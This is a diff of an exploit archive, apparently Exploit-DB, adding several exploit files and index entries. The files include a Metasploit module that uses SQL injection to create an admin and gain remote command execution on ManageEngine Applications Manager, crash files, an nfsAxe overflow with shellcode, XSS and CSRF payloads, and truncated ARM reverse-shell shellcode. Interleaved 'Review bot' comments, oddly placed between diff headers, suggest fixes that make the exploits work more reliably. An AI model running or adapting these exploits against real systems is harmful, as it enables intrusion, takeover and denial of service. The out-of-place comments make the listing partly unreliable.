diff --git a/exploits/hardware/dos/46733.py b/exploits/hardware/dos/46733.py
new file mode 100755
index 000000000..3b700a247
--- /dev/null
+++ b/exploits/hardware/dos/46733.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python
+# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
+# Date: 19/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.qnap.com
+# Version: 1.3.4.0317 and below are vulnerable
+# Software Link: https://www.qnap.com/en/utilities/essentials
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP/7/10 (version 1.3.3.0925)
+# CVE: CVE-2019-7181
+# POC
+# 1.) Generate qnap.txt
+# 2.) Copy the contents of qnap.txt to the clipboard
+# 3.) Paste the contents in any username/password field(Add or Edit VPN)
+# 4.) Click ok, program crashes.
+# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("qnap.txt","w")
+ print "[+] Creating %s bytes QNAP payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/multiple/dos/46735.html b/exploits/multiple/dos/46735.html
new file mode 100644
index 000000000..66a6f92d8
--- /dev/null
+++ b/exploits/multiple/dos/46735.html
@@ -0,0 +1,47 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/remote/46740.rb b/exploits/multiple/remote/46740.rb
new file mode 100755
index 000000000..f1ea72b9a
--- /dev/null
+++ b/exploits/multiple/remote/46740.rb
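Review bot: The bare `except:` at the end of the QNAP script hides why `qnap.txt` could not be written (read-only directory, permissions) and also swallows KeyboardInterrupt; narrow it to `except IOError as e:` and include `e` in the message so the operator sees the real cause. `print` as a statement ties the PoC to Python 2 while the shebang is the unversioned `/usr/bin/python`, so on a host where that resolves to Python 3 the file fails to parse before anything is written; `print("...")` works on both. The header states 1.3.4.0317 and below are vulnerable but the only tested build listed is 1.3.3.0925, so the upper bound should be marked as vendor-reported or confirmed by a test on that build.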
@@ -0,0 +1,313 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "ManageEngine Applications Manager < 14.0 - Authentication Bypass / Remote Command Execution",
+ 'Description' => %q(
+ This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions.
+ It is completely different from the previous EDB-ID:46725 exploit.
+
+ Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides authentication bypass.
+ Therefore an unauthenticated user can gain the authority of "system" on the server.
+ It uploads malicious file using the "Execute Program Action(s)" feature of the app with the new admin account.
+
+ Tested: Applications Manager 14 on Linux 64-bit (PostgreSQL)
+ Applications Manager 14 on Windows 10 64-bit (MSSQL)
+ Applications Manager 14 on Windows 10 64-bit (PostgreSQL)
+ Applications Manager 13 on Windows Server 2012 R2 64-bit (MSSQL)
+ Applications Manager 12 on Windows Server 2012 R2 64-bit (PostgreSQL)
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://pentest.com.tr/exploits/ManageEngine-App-Manager-14-Auth-Bypass-Remote-Command-Execution.html' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 60, # countermeasure
+ 'RPORT' => 8443,
+ 'SSL' => true
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ },
+ 'Platform' => ['unix', 'win', 'linux'],
+ 'Targets' =>
+ [
+ [ 'Windows Target',
+ {
+ 'Platform' => ['win'],
+ 'Arch' => ARCH_CMD,
+ }
+ ],
+ [ 'Linux Target',
+ {
+ 'Platform' => ['unix','linux'],
+ 'Arch' => ARCH_CMD,
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic perl ruby python',
+ }
+ }
+ }
+ ]
+ ],
+ 'DisclosureDate' => '22 April 2019',
+ 'DefaultTarget' => 1))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path of ME', '/'])
+ ],self.class)
+ end
+
+ def peer
+ "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+ end
+
+ def print_status(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def print_error(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def print_good(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def exec(action)
+ # operation of malicious file. The end of the adventure :(
+ send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+ 'cookie' => @cookie,
+ 'vars_get' => {
+ 'method' => 'testAction',
+ 'actionID' => action,
+ 'haid' => 'null'
+ }
+ )
+ end
+##
+# platform check
+##
+ def check_platform
+ # First touch to support of execute program ;)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'showTile.do'),
+ 'cookie' => @cookie,
+ 'vars_get' => {
+ 'TileName' => '.ExecProg',
+ 'haid' => 'null',
+ }
+ )
+ if res && res.code == 200 && res.body.include?('createExecProgAction')
+ # Platform can be discovered precisely using an application dir.
+ @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0] # It will be recalled later
+ if @dir =~ /:/
+ platform = Msf::Module::Platform::Windows
+ else
+ platform = Msf::Module::Platform::Unix
+ end
+ else
+ fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+ end
+ file_up(platform, @dir)
+ end
+##
+# Creating and sending malicious files
+##
+ def file_up(platform, dir)
+ # specifying an extension by platform
+ if platform == Msf::Module::Platform::Windows
+ filex = ".bat"
+ else
+ if payload.encoded =~ /sh/
+ filex = ".sh"
+ elsif payload.encoded =~ /perl/
+ filex = ".pl"
+ elsif payload.encoded =~ /python/
+ filex = ".py"
+ elsif payload.encoded =~ /ruby/
+ filex = ".rb"
+ else
+ fail_with(Failure::Unknown, 'Payload type could not be checked!')
+ end
+ end
+
+ @fname= rand_text_alpha(9 + rand(3)) + filex
+ data = Rex::MIME::Message.new
+ data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+ data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'data' => data.to_s,
+ 'agent' => 'Mozilla',
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'cookie' => @cookie,
+ 'uri' => normalize_uri(target_uri, "Upload.do")
+ })
+
+ if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+ print_good("#{@fname} malicious file has been uploaded.")
+ create_exec_prog(dir, @fname) # Great. Let's send them somewhere else o_O
+ else
+ fail_with(Failure::Unknown, 'The file could not be uploaded!')
+ end
+ end
+
+ def create_exec_prog(dir, fname)
+
+ @display = rand_text_alphanumeric(7)
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'adminAction.do'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+ 'method' => 'createExecProgAction',
+ 'id' => 0,
+ 'displayname' => @display,
+ 'serversite' => 'local',
+ 'choosehost' => -2,
+ 'abortafter' => 5, # I think it would be enough for once. But I gave 5 O_o
+ 'command' => fname,
+ 'execProgExecDir' => dir,
+ 'cancel' => 'false'
+ }
+ )
+
+ if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+ # Find actionID simply from body res
+ actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0]
+ print_status("Transactions completed. Attempting to get a session...")
+ exec(actionid)
+ else
+ fail_with(Failure::Unreachable, 'Connection error occurred!')
+ end
+
+ end
+##
+# Check all
+##
+ def check
+ # Instead of detecting the database type, we can guarantee the vuln by sending a separate query to both.
+ # The platform can be linux and possible remotely connected to the MSSQL database.
+ # In the same way platform can be windows and postgresql can be used.
+ # Thats why we are sending two queries. We will check the platform inside.
+ @uname = Rex::Text.rand_text_alpha_lower(6)
+ uid = rand_text_numeric(3)
+ apk = rand_text_numeric(6)
+ @pwd = rand_text_alphanumeric(8+rand(9))
+ # MSSQL injection should be prepared with ASCII characters.
+ # Map and join can be used for this.
+ @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)" # "ADMIN" CHARs - should not be random
+ # PostgreSQL injection query // no need APIKEY
+ pg_user =""
+ pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+ pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+ pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+ # MSSQL injection query
+ ms_user =""
+ ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+ ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+ ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+ # Send SQL queries to both types of database(PostreSQL,MSSQL) with SQLi vuln..
+ use_sqli(ms_user, pg_user)
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'applications.do'),
+ )
+ # If the user we sent with queries was created, the login will be successful with new admin user.
+ if res && res.code == 200 && res.body.include?('.loginDiv') # css control makes more sense. The application language may not be English.
+ @cookie = res.get_cookies
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'j_security_check'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'clienttype' => 'html',
+ 'j_username' => @uname,
+ 'j_password' => @pwd
+ }
+ )
+
+ if res && res.code == 302 && res.body.include?('Redirecting to')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'applications.do'),
+ 'cookie' => @cookie
+ )
+ @cookie = res.get_cookies # last cookie
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ else
+ return Exploit::CheckCode::Safe
+ end
+
+ end
+
+ def exploit
+ unless Exploit::CheckCode::Vulnerable == check
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+ end
+ print_good("Excellent! Logged in as #{@uname}")
+ print_status("Admin Username => #{@uname}")
+ print_status("Admin Password => #{@pwd}")
+ check_platform # Start the adventure
+ end
+##
+# Communication with the database
+##
+ def use_sqli(mssql, postgresql)
+ # two different post data must be sent.
+ # Because the query structures are different.
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+ 'vars_post' => {
+ 'resourceid' => mssql
+ }
+ )
+ # important to send the +/$ characters clear
+ send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+ 'data' => "resourceid=#{postgresql}"
+ }, 25)
+
+ end
+end
+##
+# The end of the codes (o_O) // AkkuS
+##
\ No newline at end of file
diff --git a/exploits/php/webapps/46734.txt b/exploits/php/webapps/46734.txt
new file mode 100644
index 000000000..98e9740d7
--- /dev/null
+++ b/exploits/php/webapps/46734.txt
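Review bot: `check` is not a read-only probe: it runs the SQL injection via `use_sqli`, inserts a persistent ADMIN row into `AM_UserPasswordTable`/`AM_UserGroupTable` and logs in with it, so a bare `check` run (and `exploit`, which calls `check`) leaves an attacker-controlled admin account on the target that nothing in the module removes. `Msf::Exploit::FileDropper` is included but `register_file_for_cleanup` is never called, so the uploaded script and the created "Execute Program" action are also left behind; after the `icon_message_success` test in `file_up`, add `register_file_for_cleanup(@fname)` (using whatever path `Upload.do` actually writes to, which the module does not show) and state in the description that the admin user and the action must be deleted by hand. `actionid = res.body.split('actionid=')[1].split(...)[0]` in `create_exec_prog`, and the `execProgExecDir` split in `check_platform`, raise NoMethodError on nil when the page layout differs instead of failing with a clear message; guard each with `fail_with(Failure::UnexpectedReply, 'actionid not found in response')` when the split misses.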
@@ -0,0 +1,48 @@
+# Exploit Title: Contact Form Builder [CSRF → LFI]
+# Date: 2019-03-17
+# Exploit Author: Panagiotis Vagenas
+# Vendor Homepage: http://web-dorado.com/
+# Software Link: https://wordpress.org/plugins/contact-form-builder
+# Version: 1.0.67
+# Tested on: WordPress 5.1.1
+
+Description
+-----------
+
+Plugin implements the following AJAX actions:
+
+- `ContactFormMakerPreview`
+- `ContactFormmakerwdcaptcha`
+- `nopriv_ContactFormmakerwdcaptcha`
+- `CFMShortcode`
+
+All of them call the function `contact_form_maker_ajax`. This function
+dynamicaly loads a file defined in `$_GET['action']` or
+`$_POST['action']` if the former is not defined. Because of the way
+WordPress defines the AJAX action a user could define the plugin action
+in the `$_GET['action']` and AJAX action in the `$_POST['action']`.
+Leveraging that and the fact that no sanitization is performed on the
+`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
+file using directory traversal thus leading to Local File Inclusion
+vulnerability.
+
+PoC
+---
+
+```html
+
+
+
+``` \ No newline at end of file diff --git a/exploits/php/webapps/46738.html b/exploits/php/webapps/46738.html new file mode 100644 index 000000000..31133a1de --- /dev/null +++ b/exploits/php/webapps/46738.html @@ -0,0 +1,55 @@ +# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user +# Date: 2019-04-14 +# Exploit Author: ax8 +# Vendor Homepage: https://github.com/Li-Siyuan +# Software Link: http://www.74cms.com/download/index.html +# Version: v5.0.1 +# CVE : CVE-2019-11374 + + + +74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI. + + + + + + + + + + + + CSRF Proof + + + + + + + +
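Review bot: The ```html PoC block carries no content in this listing (the lines between the opening and closing fence are empty), so the traversal value placed in `$_GET['action']` and the file it ends up including cannot be reproduced from the advisory; spell the request out in text, e.g. the `admin-ajax.php?action=<traversal>` URL together with the `$_POST['action']` value that selects the plugin hook. The description lists a `nopriv_ContactFormmakerwdcaptcha` hook, which suggests the same code path may be reachable without a logged-in victim — that is an inference from the hook name, not something the text confirms, but if true this is an unauthenticated LFI rather than only a CSRF and the title should say so. The word "dynamicaly" in the description should read "dynamically".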
+ + + + + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/46739.html b/exploits/php/webapps/46739.html new file mode 100644 index 000000000..b19234bae --- /dev/null +++ b/exploits/php/webapps/46739.html @@ -0,0 +1,68 @@ +# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information + +# Date: 2019-04-14 +# Exploit Author: ax8 +# Vendor Homepage: https://github.com/Li-Siyuan +# Software Link: https://www.msvodx.com/ +# Version: v10 +# CVE : CVE-2019-11375 + + + +Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI. + + + + + + + + + + + + CSRF Proof + + + + + + + +
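Review bot: The form markup of the 74CMS PoC appears to be missing from this listing (every line after the one-sentence description is empty apart from the "CSRF Proof" title), so the field names posted to `index.php?m=Admin&c=admin&a=add`, the method, and whether the form auto-submits cannot be checked; name the username/password/role parameters in the text so the request can be rebuilt without the markup. The advisory should also state the precondition that the victim is logged in as an administrator and whether a vendor fix or a CSRF token exists in later releases, neither of which the text gives.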
+ + + + + + + + + + + + + + + + + + + + + +
+
+
+
+
+
+MISC:http://www.iwantacve.cn/index.php/archives/198/
\ No newline at end of file
diff --git a/exploits/php/webapps/46741.txt b/exploits/php/webapps/46741.txt
new file mode 100644
index 000000000..ce87cd90c
--- /dev/null
+++ b/exploits/php/webapps/46741.txt
@@ -0,0 +1,43 @@
+# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
+# Google Dork: intext:"by UliCMS"
+# Exploit Author: Kağan EĞLENCE
+# Vendor Homepage: https://en.ulicms.de/
+# Version: 2019.2 , 2019.1
+# CVE : CVE-2019-11398
+
+### Vulnerability 1
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/loginform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result :
+
+### Vulnerability 2
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/registerform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result :
+
+### Vulnerability 3 - Authenticated
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+Request Type: GET
+Vulnerable Parameter : "error"
+Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+
+### History
+=============
+2019-04-13 Issue discovered
+2019-04-13 Vendor contacted
+2019-04-13 Vendor response and hotfix
+2019-04-14 Vendor releases fixed versions
+2019-04-22 Advisory release
\ No newline at end of file
diff --git a/exploits/windows/dos/46732.py b/exploits/windows/dos/46732.py
new file mode 100755
index 000000000..906aad363
--- /dev/null
+++ b/exploits/windows/dos/46732.py
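Review bot: The Msvod PoC form is not visible in this listing (the lines after the description are empty), so the fields posted to `admin/member/edit.html` and which user attributes an attacker can change cannot be verified; list the parameter names (and whether a password or role field is among them, which decides the severity) in the text. The advisory also omits the precondition that the victim holds an authenticated admin session and gives no vendor response or fixed version, so readers cannot tell whether v10 remains exposed.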
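Review bot: Vulnerability 3 omits the "Vulnerable File" entry that items 1 and 2 carry, and both "Result :" lines are empty here, so the reflected context has to be guessed from the payloads; add the file for item 3 and describe the reflected output in text rather than a screenshot. Items 1 and 2 break out of a single-quoted attribute on the pre-auth login and register forms (`go=test' accesskey='X' onclick='alert(1)`), which is the realistic vector against an administrator, but the `onclick` only fires when the victim presses the access key or clicks the element, so the impact note should say the attack needs that interaction, unlike item 3's plain `<script>` reflection. The History section says fixed versions shipped on 2019-04-14 but never names them; state the fixed release so readers can tell whether their install is patched.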
@@ -0,0 +1,28 @@
+# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
+# Date: 19.04.19
+# Vendor Homepage:http://www.audiotool.net/download.htm
+# Software Link: http://www.audiotool.net/download/audioconverter.exe
+# Exploit Author: Achilles
+# Tested Version: 5.30
+# Tested on: Windows 7 x64 Sp1
+
+# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
+# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
+# 3.- Load the file "Evil.mp4"
+# 4.- Click ok
+# 5.- Click Gut
+# 5.- And you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+ f=open("Evil.mp4","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46737.py b/exploits/windows/local/46737.py
new file mode 100755
index 000000000..b72835fea
--- /dev/null
+++ b/exploits/windows/local/46737.py
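Review bot: `#!/usr/bin/env python` sits on line 18, after the comment header and three blank lines, so it is an ordinary comment and the script has no working shebang; move it to line 1. The `print` statements are Python 2 syntax while `env python` resolves to whatever interpreter is first on PATH, so on a Python 3 host the file fails to parse before `Evil.mp4` is written; `print("...")` runs on both. The bare `except:` prints a fixed message and drops the actual error — `except IOError as e: print("File cannot be created: %s" % e)` tells the operator what went wrong. Two steps in the header are both numbered "5.-".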
@@ -0,0 +1,36 @@
+#!/usr/bin/python
+# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
+# Date: 20-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.labf.com/nfsaxe
+# Version: 3.7
+# Software Link : http://www.labf.com/download/nfsaxe.exe
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# PoC:
+# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
+# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
+# 3.) Click Start and calc pops
+#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
+#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)
+
+shellcode = ("\x31\xC9"
+ "\x51"
+ "\x68\x63\x61\x6C\x63"
+ "\x54"
+ "\xB8\xC7\x93\xC2\x77"
+ "\xFF\xD0")
+
+buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)
+
+payload = buffer
+try:
+ f=open("nfsaxeping.txt","w")
+ print "[+] Creating %s bytes ping payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ac809f009..17aa7409c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
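Review bot: The exploit depends on two absolute addresses, not the one the header documents: besides the `jmp esp` in ole32.dll (0x775a693b), the 16-byte shellcode contains `\xB8\xC7\x93\xC2\x77` / `\xFF\xD0`, i.e. `mov eax, 0x77c293c7; call eax`, a second hard-coded XP SP3 EN address in a module the comments never name, so a different language pack or patch level breaks the payload even where ole32 matches. Add a comment on that line, e.g. `# mov eax,0x77c293c7 ; call eax -> absolute XP SP3 EN address (module not identified here), rebase for other builds`. The file is opened in text mode `"w"`; none of the bytes written here are \x0a or \x0d, but `"wb"` keeps the write byte-exact when the shellcode is swapped. The bare `except:` drops the reason the file could not be created; `except IOError as e:` and printing `e` fixes that.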
@@ -6392,6 +6392,9 @@ id,file,description,date,author,type,platform,port
 46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
 46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
 46726,exploits/multiple/dos/46726.txt,"Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)",2019-04-18,"Fakhri Zulkifli",dos,multiple,
+46732,exploits/windows/dos/46732.py,"Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)",2019-04-22,Achilles,dos,windows,
+46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,
+46735,exploits/multiple/dos/46735.html,"Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)",2019-04-22,"Bogdan Kurinnoy",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10429,6 +10432,7 @@ id,file,description,date,author,type,platform,port
 46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
 46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,
+46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17346,6 +17350,7 @@ id,file,description,date,author,type,platform,port
 46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
 46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
+46740,exploits/multiple/remote/46740.rb,"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)",2019-04-22,AkkuS,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41166,3 +41171,7 @@ id,file,description,date,author,type,platform,port
 46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80
 46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows,
 46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,
+46734,exploits/php/webapps/46734.txt,"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion",2019-04-22,"Panagiotis Vagenas",webapps,php,80
+46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80
+46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80
+46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 50c4f5635..a03003442 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -957,3 +957,4 @@ id,file,description,date,author,type,platform
 46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
 46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
 46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
+46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
diff --git a/shellcodes/arm/46736.txt b/shellcodes/arm/46736.txt
new file mode 100644
index 000000000..02843cc85
--- /dev/null
+++ b/shellcodes/arm/46736.txt
@@ -0,0 +1,100 @@
+/*
+* Title: Linux/ARM - Password-Protected Reverse TCP Shell
+* Date: 2019-04-20
+* Tested: armv6 (32-bit Raspberry Pi I)
+* Author: Alan Vivona - @syscall59 - medium.syscall59.com
+* Size: 100 bytes
+* No null bytes / Null-free
+*/
+
+.section .text
+.global _start
+_start:
+
+.arm
+ add r3, pc, #1 // switch to thumb mode
+ bx r3
+
+.thumb
+
+// [281] socket(2, 1, 0)
+ mov r0, #2
+ mov r1, #1
+ eor r2, r2
+ mov r7, #200
+ add r7, #81
+ svc #1
+mov r10, r0 // save sockfd into r10
+
+// [283] connect(socketfd, target, addrlen)
+ // socket fd is in r0 already
+ adr r1, target
+ strb r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
